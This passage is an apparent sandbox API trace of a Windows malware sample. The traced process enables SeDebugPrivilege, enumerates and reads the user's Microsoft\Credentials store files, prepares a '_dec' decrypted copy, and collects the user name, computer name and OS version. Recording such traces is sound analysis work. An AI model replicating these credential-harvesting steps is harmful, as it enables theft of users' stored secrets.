0x5c7a10 [0121.962] GetProcessHeap () returned 0x5b0000 [0121.963] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0121.963] GetProcessHeap () returned 0x5b0000 [0121.963] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc628 | out: hHeap=0x5b0000) returned 1 [0121.963] GetProcessHeap () returned 0x5b0000 [0121.963] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0121.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0121.964] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0121.965] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x250 [0121.966] SetFilePointer (in: hFile=0x250, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.974] WriteFile (in: hFile=0x250, lpBuffer=0xdfbbc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0xdfb80, lpOverlapped=0x0 | out: lpBuffer=0xdfbbc*, lpNumberOfBytesWritten=0xdfb80*=0x1, lpOverlapped=0x0) returned 1 [0121.975] CloseHandle (hObject=0x250) returned 1 [0121.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0121.977] AllocateAndInitializeSid (in: pIdentifierAuthority=0xdfb9c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xdfba4 | out: pSid=0xdfba4*=0x5cf3f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0121.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0121.978] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5cf3f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdfba8 | out: IsMember=0xdfba8) returned 1 [0121.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0121.980] GetCurrentProcess () returned 0xffffffff [0121.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0121.982] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdfba4 | out: TokenHandle=0xdfba4*=0x240) returned 1 [0121.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0121.983] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdfb9c | out: lpLuid=0xdfb9c*(LowPart=0x14, HighPart=0)) returned 1 [0121.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0121.987] AdjustTokenPrivileges (in: TokenHandle=0x240, DisableAllPrivileges=0, NewState=0xdfb8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.987] CloseHandle (hObject=0x240) returned 1 [0121.987] GetProcessHeap () returned 0x5b0000 [0121.987] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0121.988] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0121.989] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0121.989] GetProcessHeap () returned 0x5b0000 [0121.989] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f70) returned 0x5d3e18 [0121.989] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0121.990] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\Microsoft\\Credentials", arglist=0xdfb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0121.990] GetProcessHeap () returned 0x5b0000 [0121.990] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5d2ca0 [0121.990] GetProcessHeap () returned 0x5b0000 [0121.991] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0121.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0121.992] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 1 [0121.992] GetProcessHeap () returned 0x5b0000 [0121.992] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0121.993] Sleep (dwMilliseconds=0xa) [0122.019] GetProcessHeap () returned 0x5b0000 [0122.019] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f48) returned 0x5d3e18 [0122.020] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.021] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\*", arglist=0xdf904 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0122.021] GetProcessHeap () returned 0x5b0000 [0122.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5d2d28 [0122.021] GetProcessHeap () returned 0x5b0000 [0122.021] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.022] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5be248 [0122.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.025] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0122.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.028] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0122.028] FindNextFileW (in: hFindFile=0x5be248, lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.030] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0122.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.031] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0122.031] FindNextFileW (in: hFindFile=0x5be248, lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0122.031] FindClose (in: hFindFile=0x5be248 | out: hFindFile=0x5be248) returned 1 [0122.032] GetProcessHeap () returned 0x5b0000 [0122.032] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2d28 | out: hHeap=0x5b0000) returned 1 [0122.032] GetProcessHeap () returned 0x5b0000 [0122.032] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d3e18 [0122.033] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.034] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\%s", arglist=0xdf900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0122.034] GetProcessHeap () returned 0x5b0000 [0122.034] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5d2d28 [0122.034] GetProcessHeap () returned 0x5b0000 [0122.034] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.034] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5be248 [0122.035] FindNextFileW (in: hFindFile=0x5be248, lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.035] FindNextFileW (in: hFindFile=0x5be248, lpFindFileData=0xdf914 | out: lpFindFileData=0xdf914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0122.036] FindClose (in: hFindFile=0x5be248 | out: hFindFile=0x5be248) returned 1 [0122.036] GetProcessHeap () returned 0x5b0000 [0122.036] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2d28 | out: hHeap=0x5b0000) returned 1 [0122.036] GetProcessHeap () returned 0x5b0000 [0122.036] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ca0 | out: hHeap=0x5b0000) returned 1 [0122.036] GetProcessHeap () returned 0x5b0000 [0122.036] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0122.037] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0122.038] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0122.038] GetProcessHeap () returned 0x5b0000 [0122.038] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f70) returned 0x5d3e18 [0122.038] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.039] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\Microsoft\\Credentials", arglist=0xdfb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 57 [0122.039] GetProcessHeap () returned 0x5b0000 [0122.039] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x76) returned 0x5c7990 [0122.039] GetProcessHeap () returned 0x5b0000 [0122.040] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.040] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 1 [0122.040] GetProcessHeap () returned 0x5b0000 [0122.041] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0122.042] Sleep (dwMilliseconds=0xa) [0122.061] GetProcessHeap () returned 0x5b0000 [0122.061] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f48) returned 0x5d3e18 [0122.061] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.062] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\*", arglist=0xdf8ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0122.062] GetProcessHeap () returned 0x5b0000 [0122.062] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5d2ca0 [0122.062] GetProcessHeap () returned 0x5b0000 [0122.063] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.063] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bde08 [0122.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.065] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0122.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.067] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0122.067] FindNextFileW (in: hFindFile=0x5bde08, lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.069] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0122.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.071] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0122.071] FindNextFileW (in: hFindFile=0x5bde08, lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0122.072] FindNextFileW (in: hFindFile=0x5bde08, lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0122.072] FindClose (in: hFindFile=0x5bde08 | out: hFindFile=0x5bde08) returned 1 [0122.072] GetProcessHeap () returned 0x5b0000 [0122.073] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ca0 | out: hHeap=0x5b0000) returned 1 [0122.073] GetProcessHeap () returned 0x5b0000 [0122.073] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d3e18 [0122.073] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.074] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\%s", arglist=0xdf8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0122.074] GetProcessHeap () returned 0x5b0000 [0122.074] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5d2ca0 [0122.074] GetProcessHeap () returned 0x5b0000 [0122.075] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.075] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bde08 [0122.076] FindNextFileW (in: hFindFile=0x5bde08, lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.076] FindNextFileW (in: hFindFile=0x5bde08, lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0122.076] GetProcessHeap () returned 0x5b0000 [0122.076] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d3e18 [0122.077] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.078] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\%s", arglist=0xdf8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D") returned 90 [0122.078] GetProcessHeap () returned 0x5b0000 [0122.078] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb8) returned 0x5d2d28 [0122.078] GetProcessHeap () returned 0x5b0000 [0122.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.080] StrStrW (lpFirst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpSrch="_dec") returned 0x0 [0122.080] GetProcessHeap () returned 0x5b0000 [0122.080] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4c) returned 0x5d3e18 [0122.080] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.081] wvsprintfW (in: param_1=0x5d3e18, param_2="%s_dec", arglist=0xdf670 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D_dec") returned 94 [0122.081] GetProcessHeap () returned 0x5b0000 [0122.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc0) returned 0x5cc9f0 [0122.081] GetProcessHeap () returned 0x5b0000 [0122.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.082] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0122.083] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0xdf654 | out: lpFileSizeHigh=0xdf654*=0x0) returned 0x2ac0 [0122.084] VirtualAlloc (lpAddress=0x0, dwSize=0x2ac0, flAllocationType=0x1000, flProtect=0x4) returned 0x1f0000 [0122.085] ReadFile (in: hFile=0x254, lpBuffer=0x1f0000, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0xdf650, lpOverlapped=0x0 | out: lpBuffer=0x1f0000*, lpNumberOfBytesRead=0xdf650*=0x2ac0, lpOverlapped=0x0) returned 1 [0122.087] CloseHandle (hObject=0x254) returned 1 [0122.088] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.089] GetProcessHeap () returned 0x5b0000 [0122.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0122.089] GetProcessHeap () returned 0x5b0000 [0122.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2d28 | out: hHeap=0x5b0000) returned 1 [0122.090] FindNextFileW (in: hFindFile=0x5bde08, lpFindFileData=0xdf8fc | out: lpFindFileData=0xdf8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0122.090] FindClose (in: hFindFile=0x5bde08 | out: hFindFile=0x5bde08) returned 1 [0122.090] GetProcessHeap () returned 0x5b0000 [0122.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ca0 | out: hHeap=0x5b0000) returned 1 [0122.091] GetProcessHeap () returned 0x5b0000 [0122.091] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7990 | out: hHeap=0x5b0000) returned 1 [0122.091] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0122.095] GetProcessHeap () returned 0x5b0000 [0122.095] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7a10 | out: hHeap=0x5b0000) returned 1 [0122.095] GetProcessHeap () returned 0x5b0000 [0122.096] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1388) returned 0x5ccd70 [0122.096] GetProcessHeap () returned 0x5b0000 [0122.096] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5cf338 [0122.096] GetProcessHeap () returned 0x5b0000 [0122.096] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x11c) returned 0x5d2ca0 [0122.097] RtlGetVersion (in: lpVersionInformation=0x5d2ca0 | out: lpVersionInformation=0x5d2ca0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0122.097] GetProcessHeap () returned 0x5b0000 [0122.097] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ca0 | out: hHeap=0x5b0000) returned 1 [0122.098] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfb18 | out: lpSystemTimeAsFileTime=0xdfb18*(dwLowDateTime=0xd675efd, dwHighDateTime=0x1d8a8a4)) [0122.098] GetProcessHeap () returned 0x5b0000 [0122.098] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7) returned 0x5ca9f0 [0122.098] GetProcessHeap () returned 0x5b0000 [0122.098] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0122.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.099] GetUserNameW (in: lpBuffer=0x5cc9f0, pcbBuffer=0xdfb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdfb74) returned 1 [0122.100] GetProcessHeap () returned 0x5b0000 [0122.100] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0122.100] GetProcessHeap () returned 0x5b0000 [0122.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0122.100] GetComputerNameW (in: lpBuffer=0x5cc9f0, nSize=0xdfb74 | out: lpBuffer="XC64ZB", nSize=0xdfb74) returned 1 [0122.100] GetProcessHeap () returned 0x5b0000 [0122.101] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0122.101] GetCurrentThread () returned 0xfffffffe [0122.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.102] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0xdfb74 | out: TokenHandle=0xdfb74*=0x0) 